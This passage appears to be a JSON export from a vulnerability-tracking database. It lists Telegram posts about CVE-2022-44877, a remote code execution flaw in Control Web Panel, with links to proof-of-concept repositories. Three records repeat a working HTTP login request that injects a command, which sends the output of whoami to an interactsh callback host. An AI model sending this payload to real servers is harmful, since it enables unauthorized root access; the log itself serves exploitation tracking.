"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/6905", "content": "Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877\n\nhttps://github.com/numanturle/CVE-2022-44877", "creation_timestamp": "2023-01-05T19:40:32.000000Z"}, {"uuid": "401b0c18-3f23-44c5-9e6a-2a57ca910bcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2637", "content": "#Red_Team\n\nRed Team utilities for setting up CWP CentOS 7 payload &amp; reverse shell, as it refers to CVE-2022-44877\n\nhttps://github.com/hotpotcookie/cwp-rce-white-box\n\n@BlueRedTeam", "creation_timestamp": "2023-03-30T08:15:53.000000Z"}, {"uuid": "e0d7da86-fc83-4d2b-9f09-9f727cebdb67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/xakep_ru/13470", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 Control Web Panel \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0440\u0435\u0432\u0435\u0440\u0441-\u0448\u0435\u043b\u043b\u043e\u0432\n\n\u0418\u0411-\u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-44877 (9,8 \u0431\u0430\u043b\u043b\u0430 \u0438\u0437 10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS), \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0432 Control Web Panel (CWP), \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438, \u0440\u0430\u043d\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u043c \u043a\u0430\u043a CentOS Web Panel.\n\nhttps://xakep.ru/2023/01/13/cwp-attacks/", "creation_timestamp": "2023-01-13T21:10:31.000000Z"}, {"uuid": "7f581f15-26c4-4d12-85d1-741f99cf46a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/CNArsenal/392", "content": "CVE-2022-44877\nControl Web Panel Unauth RCE\n\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login\n\n#exploit #poc", "creation_timestamp": "2024-08-20T17:04:34.000000Z"}, {"uuid": "6aa2d8ea-2ca0-4741-914d-5ed6d556b6a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/BugCod3/107", "content": "Control Web Panel Unauthenticated Remote Command Execution Exploit\n\n\u2796 Category: remote exploits\n\n\ud83d\udda5 Platform: linux\n\n\ud83e\ude96 Risk: Security Risk Critical \ud83d\udea8\n\n\ud83d\uddc2\ufe0f Size: \ud83c\udd70\ud83c\udd70\ud83c\udd70\ud83d\udcdd\ud83d\udcdd\n\n\ud83d\udcdd\nDescription: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.\n\n\u2b50 CVE: CVE-2022-44877\n\n#CVE #Linux #Exploit\n\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\n\ud83d\udc64 T.me/MRvirusIRBOT \n\ud83d\udce2 T.me/SashClient\n\ud83e\udea9 Https://discord.gg/UfFvDYBBMM \n\ud83c\udf10 Https://sash.mybin.ir", "creation_timestamp": "2023-02-01T02:22:30.000000Z"}, {"uuid": "d4ef0612-6793-49a0-b044-82af1d624153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/398", "content": "", "creation_timestamp": "2023-01-15T09:51:24.000000Z"}, {"uuid": "c47e660a-1d55-4cf8-ac04-f24e6294ff7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4535", "content": "CVE-2022-44877 \n\nCentos Web Panel 7 Unauthenticated Remote Code Execution \n\nGithub \n\n#rce\n\u2014\u2014\u2014\u2014\u2014\u2014\u200c\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-17T00:38:49.000000Z"}, {"uuid": "1f85fca9-3b83-45d5-8ef5-68cb8faedde1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7503", "content": "#exploit\n1. CVE-2022-41076:\nThe OWASSRF + TabShell exploit chain\nhttps://blog.viettelcybersecurity.com/tabshell-owassrf\n]-&gt; https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e\n\n2. CVE-2022-3515/CVE-2022-47629:\nInteger overflow bug Libksba\u00a0library (x.509)\nhttps://github.com/elttam/publications/blob/master/writeups/CVE-2022-47629.md \n\n3. CVE-2022-44877:\nCentos Web Panel 7 Unauthenticated RCE\nhttps://github.com/numanturle/CVE-2022-44877", "creation_timestamp": "2023-01-10T05:13:06.000000Z"}, {"uuid": "970a92c9-1443-40bf-9f50-4e9f4841472d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44875", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8709", "content": "#Blue_Team_Techniques\n1. Testing CVE-2022-44875\nhttps://github.com/c0d30d1n/CVE-2022-44875-Test\n2. Test tool for CVE-2020-1472 (Zerologon)\nhttps://github.com/SecuraBV/CVE-2020-1472\n3. Tool for scanning/exploiting the famous SQL injection vulnerability in more than millions of sites\nhttps://github.com/mr-sami-x/SQLi", "creation_timestamp": "2025-03-29T16:32:29.000000Z"}, {"uuid": "8365f0cd-f70b-4f82-9a51-a17e2b81046b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/LearnExploit/4546", "content": "CVE-2022-44877\n\nControl Web Panel Unauth RCE\n\nusage :\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login\n\n#RCE #CVE \n\u2014\u2014\u2014\u2014\u2014\u2014\u200c\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-17T00:38:51.000000Z"}, {"uuid": "b2ea6888-ebd4-4ef4-80a5-6ef093a616fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/5153", "content": "CVE-2022-44877\n\nControl Web Panel Unauth RCE\n\nPOC usage:\n\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login\n\n#Cve #rce\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-05-28T10:23:50.000000Z"}]}